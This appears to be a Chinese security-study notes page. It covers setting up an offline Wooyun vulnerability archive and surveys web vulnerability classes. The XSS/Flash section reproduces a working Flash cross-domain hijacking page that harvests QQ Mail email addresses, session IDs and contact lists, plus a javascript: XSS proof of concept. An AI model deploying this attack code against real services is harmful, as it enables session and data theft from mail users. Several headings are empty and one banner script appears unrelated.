[TOC]

0x00 前言简述

所谓工欲善其事必先利其器以下是学习网络安全必备:

  • (1) Wooyun镜像站本地离线搭建:php5.6 (需要安装mysql扩展-用xampp即可注意PHP与数据库版本)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    # 乌云漏洞库
    https://pan.baidu.com/s/1oJr2eWtcgYSe1tp5o26tBw 提取码:g3l7
    # 乌云知识库
    https://github.com/SuperKieran/WooyunDrops


    #存放路径:
    phpstudy
    ├─WWW
    ├─Bugs.zip(解压后是Bugs文件夹)
    ├─conn.php(修改里面的数据库用户名和密码)
    ├─upload(自己创建)
    ├─10-14.zip(拖到这里解压)
    ├─15-a.zip(拖到这里解压)
    ├─15-b.zip(拖到这里解压)
    ├─16.zip(拖到这里解压)
    |-static (乌云知识库)
    ├─MySQL
    ├─data
    ├─wooyun(自己创建)
    ├─wooyun.zip(拖到这里解压)


问题解决:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
-- #(1) 开启php短标签编辑php.ini或者加上将<? ?>变成`<?php ?>`
short_open_tag = On

-- #(2) 图片不能正常显示的两种解决方法
192.168.150.130 static.loner.fm
UPDATE wooyun.bugs SET article_title = replace(article_title, 'static.loner.fm', '192.168.150.130') ;

-- #(3) 记录是否看过该篇乌云漏洞
create table record (
id int(11) NOT NULL PRIMARY KEY AUTO_INCREMENT,
wybug_id longtext NOT NULL,
rtime datetime,
INDEX mul_index (wybug_id)
);
ALTER TABLE `record` ADD UNIQUE (`wybug_id`);

-- #(4) 记录是否看过该篇乌云知识库
create table recordbook (
id int(11) NOT NULL PRIMARY KEY AUTO_INCREMENT,
page_id longtext NOT NULL,
rtime datetime,
INDEX mul_index (page_id)
);
ALTER TABLE `recordbook` ADD UNIQUE (`page_id`);


0x01 安全学习

0.安全漏洞发布网站


1.安全相关自媒体网站


2.安全研究团队网站


3.安全圈个人blog
5.网络ID信息收集

C1h2e1-QQ1119544572-Twitter@C1h2e11
蝉鸣月下独悲凉-1921409907-Team@W3bsafe
Vulkey_Chen
0ang3el
byt3bl33d3r


0x02 安全工具

1.Github项目

代理翻墙
https://github.com/shadowsocks/

网络空间指纹扫描器

Web安全模糊测试工具

Fuzz脚本字典


0x03 安全漏洞分类

1.前端漏洞

XSS-跨站脚本攻击(Cross Site Script)

描述:一种 Web 应用程序的漏洞,来自用户的不可信数据在没有验证情况下被应用程序进行了处理,没有正确转义(escape)编码(encode)反射回浏览器,导致浏览器引擎执行了非预期代码。

  • 1.XSS:

    • 存储型XSS(持久型)
    • 反射型XSS / 非持久型
    • DOM based XSS
  • 2.Flash:

Flash跨域数据挟持

以图像包装的Flash文件在victim.com上传然后于attacker.com下嵌入,此时它只能在attacker.com下执行JavaScript(由于同源策略), 但是假如该Flash文件发出请求那么它可以读取到victim.com下的文件前提是crossdomain文件中允许访问的域包括了,我们上传的swf的地址域名;

1
2
<object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt">
</object>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
<html>
<head>
<title>just for fun</title>
<script>
var test = 1;
var sid;
var uid;
var resultCon = '';
function sendToJavaScript(strData) {
regexp = new RegExp(/([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+/g);
if ((result = regexp.exec(strData)) != null) {
resultCon = resultCon + 'users: ' + result[0] + '<br />';
while ((result = regexp.exec(strData)) != null) {
resultCon = resultCon + 'users: ' + result[0] + '<br />';
}
document.write(resultCon);
}
// 匹配 SID
var r1 = strData.match(/subtemplate=ill&sid=(.*?)&/);
if (r1 != null) {
sid = r1[1];
resultCon = resultCon + 'sid: ' + sid + '<br />';
if (test == 1) {
var theDiv = document.getElementById("havefun");
var content = document.createTextNode("");
theDiv.appendChild(content);
theDiv.innerHTML += '<object id="myObject" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash" data="http://join.qq.com/upload/photo/150914/439a57750ce65071b5cdbdaf0ce3bb7e.jpg"><param name="AllowScriptAccess" value="always"><param name="flashvars" value="input=http://set1.mail.qq.com/cgi-bin/laddr_lastlist?sid=' + sid + '%26t=addr_datanew%26category=hot"></object>';
}
test++;
}
}
</script>
</head>

<body>
just for fun
<div id=havefun></div>
<object id="myObject" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash"
data="http://join.qq.com/upload/photo/150914/439a57750ce65071b5cdbdaf0ce3bb7e.jpg">
<param name="AllowScriptAccess" value="always">
<param name="flashvars"
value="input=http://mail.qq.com/cgi-bin/mail_spam?action=check_link%26url=http://www.baidu.com">
</object>
</body>

</html>

<script type="text/javascript">
//立即运行的匿名函数
!function () {
var closed = false,bdiv;
var charset = document.charset || document.characterSet;
var utf8 = ['该页面的提供者尚未完成', '实名认证', '您的访问可能存在风险'];
var gbk = ['??ҳ????ṩ????δ???', 'ʵ????֤', '???ķ??ʿ??ܴ??ڷ???'];
var en = ['The provider of this page is not', 'verified', 'there are risks when you visiting'];

function banner() {
var char = charset.toLowerCase(),
lang = '';
switch (true) {
case char.indexOf('utf') == 0:
lang = utf8;
break;
case char.indexOf('gb') == 0:
lang = gbk;
break;
default:
lang = en;
}
var _div =
'<div style="position:fixed;_position:absolute;top:0;left:0;right:0;padding:12px;background-color:rgba(0,0,0,0.5);filter: progid:DXImageTransform.Microsoft.gradient(startcolorstr=#7F000000,endcolorstr=#7F000000);color:#fff;text-align:center;font-size:16px;font-family:simsun,serif;cursor:default;z-index:2147483647;"><p style="margin:0;padding:0;">' +
lang[0] +
' <a style="text-decoration:none;color:#37afe4;" target="_blank" href="http://sae.sina.com.cn/?m=faq&a=view&doc_id=22">' +
lang[1] + '</a> ' + lang[2] +
'</p><a style="position:absolute;right:12px;top:50%;font-size:20px;color:#fff;border:none;margin:0;padding:0;;margin-top:-10px;line-height:20px;background:none;cursor:pointer;font-family:Helvetica Neue, Helvetica, Arial, sans-serif;outline:none;">x</a></div>',
div = document.createElement('div');
div.innerHTML = _div;
var close = div.getElementsByTagName('a')[1],
x = 0,
y = 0;
close.onmouseover = function (event) {
var e = event ? event : window.event;
x = e.clientX;
y = e.clientY;
};
close.onclick = function (event) {
if (event && !event.initMouseEvent) {
return
}
var e = event ? event : window.event;
if (Math.abs(e.clientX - x) < 10 && Math.abs(e.clientY - y) < 10) {
div.style.display = 'none';
closed = true;
}
};
return div
}

function t() {
if (closed) {
clearInterval(tt);
return
}
if (bdiv && bdiv.parentNode) {
bdiv.parentNode.removeChild(bdiv)
}
bdiv = banner();
document.body.appendChild(bdiv);
}
t();
var tt = setInterval(t, 5000);
}();
</script>

POC:

1
2
3
<content>
<tag img="http://travel.weiyigeek.top/1/72_1.jpg" txt="" url="javascript:alert(1);"/>
</content>

CSRF
Redirect